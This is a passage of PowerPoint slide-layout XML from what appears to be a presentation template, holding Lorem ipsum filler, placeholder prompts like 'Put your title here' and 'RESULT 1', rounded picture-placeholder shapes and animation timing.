            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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76" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569384" y="5109393"/>
            <a:ext cx="10996083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920" b="1" baseline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Put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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1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4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4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4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9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"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="1473207"/>
            <a:ext cx="5204883" cy="3447167"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3903662" h="2872639">
                <a:moveTo>
                  <a:pt x="522813" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3380849" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3669591" y="0"/>
                  <a:pt x="3903662" y="234071"/>
                  <a:pt x="3903662" y="522813"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3903662" y="2872639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2872639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="522813"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="234071"/>
                  <a:pt x="234071" y="0"/>
                  <a:pt x="522813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7" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="4920371"/>
            <a:ext cx="5204883" cy="1310640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3903662" h="1092200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3903662" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3903662" y="595030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3903662" y="869609"/>
                  <a:pt x="3681071" y="1092200"/>
                  <a:pt x="3406492" y="1092200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="497170" y="1092200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="222591" y="1092200"/>
                  <a:pt x="0" y="869609"/>
                  <a:pt x="0" y="59503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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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8" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948267" y="5140217"/>
            <a:ext cx="4622800" cy="259199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2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29" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948267" y="5434998"/>
            <a:ext cx="4622800" cy="613133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108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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="66"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6371168" y="1473207"/>
            <a:ext cx="5204883" cy="3447167"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3903662" h="2872639">
                <a:moveTo>
                  <a:pt x="522813" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3380849" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3669591" y="0"/>
                  <a:pt x="3903662" y="234071"/>
                  <a:pt x="3903662" y="522813"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3903662" y="2872639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2872639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="522813"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="234071"/>
                  <a:pt x="234071" y="0"/>
                  <a:pt x="522813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47" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6371168" y="4920371"/>
            <a:ext cx="5204883" cy="1310640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3903662" h="1092200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3903662" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3903662" y="595030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3903662" y="869609"/>
                  <a:pt x="3681071" y="1092200"/>
                  <a:pt x="3406492" y="1092200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="497170" y="1092200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="222591" y="1092200"/>
                  <a:pt x="0" y="869609"/>
                  <a:pt x="0" y="59503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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716184" y="5140217"/>
            <a:ext cx="4622800" cy="259199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2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49" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716184" y="5434998"/>
            <a:ext cx="4622800" cy="613133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108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endParaRPr lang="en-US" dirty="0" smtClean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1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900" decel="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3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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="44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900" decel="100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17" grpId="0" animBg="1"/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6" grpId="0"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="4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8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mages with resul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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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76" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="4802511"/>
            <a:ext cx="3260269" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rounded Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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7" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="1579886"/>
            <a:ext cx="3260269" cy="2108197"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2445202" h="1756831">
                <a:moveTo>
                  <a:pt x="327483" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2117719" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2298583" y="0"/>
                  <a:pt x="2445202" y="146619"/>
                  <a:pt x="2445202" y="327483"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2445202" y="1756831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1756831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="327483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="146619"/>
                  <a:pt x="146619" y="0"/>
                  <a:pt x="327483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29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="3703322"/>
            <a:ext cx="3260269" cy="777238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2445202" h="647698">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2445202" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2445202" y="289024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2445202" y="487114"/>
                  <a:pt x="2284618" y="647698"/>
                  <a:pt x="2086528" y="647698"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="358674" y="647698"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="160584" y="647698"/>
                  <a:pt x="0" y="487114"/>
                  <a:pt x="0" y="289024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9" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868539" y="3794764"/>
            <a:ext cx="648408" cy="560681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="103884" rIns="0" bIns="103884" anchor="b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0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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77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1567748" y="3778347"/>
            <a:ext cx="2259187" cy="3453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1" baseline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smtClean="0"/>
              <a:t>RESULT 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567748" y="4153138"/>
            <a:ext cx="2259187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2">
                    <a:lumMod val="50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31" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4345518" y="4802511"/>
            <a:ext cx="3260269" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="67"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4345518" y="1579886"/>
            <a:ext cx="3260269" cy="2108197"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2445202" h="1756831">
                <a:moveTo>
                  <a:pt x="327483" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2117719" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2298583" y="0"/>
                  <a:pt x="2445202" y="146619"/>
                  <a:pt x="2445202" y="327483"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2445202" y="1756831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1756831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="327483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="146619"/>
                  <a:pt x="146619" y="0"/>
                  <a:pt x="327483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33" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4345518" y="3703322"/>
            <a:ext cx="3260269" cy="777238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2445202" h="647698">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2445202" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2445202" y="289024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2445202" y="487114"/>
                  <a:pt x="2284618" y="647698"/>
                  <a:pt x="2086528" y="647698"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="358674" y="647698"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="160584" y="647698"/>
                  <a:pt x="0" y="487114"/>
                  <a:pt x="0" y="289024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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610805" y="3794764"/>
            <a:ext cx="648408" cy="560681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="103884" rIns="0" bIns="103884" anchor="b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0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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5310014" y="3778347"/>
            <a:ext cx="2259187" cy="3453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1" baseline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smtClean="0"/>
              <a:t>RESULT 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5310014" y="4153138"/>
            <a:ext cx="2259187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>
                    <a:lumMod val="50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37" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="71" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315782" y="4802511"/>
            <a:ext cx="3260269" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="72"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315782" y="1579886"/>
            <a:ext cx="3260269" cy="2108197"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2445202" h="1756831">
                <a:moveTo>
                  <a:pt x="327483" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2117719" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2298583" y="0"/>
                  <a:pt x="2445202" y="146619"/>
                  <a:pt x="2445202" y="327483"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2445202" y="1756831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1756831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="327483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="146619"/>
                  <a:pt x="146619" y="0"/>
                  <a:pt x="327483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39" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8315782" y="3703322"/>
            <a:ext cx="3260269" cy="777238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2445202" h="647698">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2445202" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2445202" y="289024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2445202" y="487114"/>
                  <a:pt x="2284618" y="647698"/>
                  <a:pt x="2086528" y="647698"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="358674" y="647698"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="160584" y="647698"/>
                  <a:pt x="0" y="487114"/>
                  <a:pt x="0" y="289024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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8581069" y="3794764"/>
            <a:ext cx="648408" cy="560681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="103884" rIns="0" bIns="103884" anchor="b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0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 smtClean="0"/>
              <a:t>ico</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="74" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9280279" y="3778347"/>
            <a:ext cx="2259187" cy="3453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1" baseline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smtClean="0"/>
              <a:t>RESULT 1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="75" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9280279" y="4153138"/>
            <a:ext cx="2259187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4">
                    <a:lumMod val="50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400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400" fill="hold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400" fill="hold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300" fill="hold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300" fill="hold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300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3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900" decel="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4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4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4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2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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3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3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3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6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2500"/>
                            </p:stCondLst>
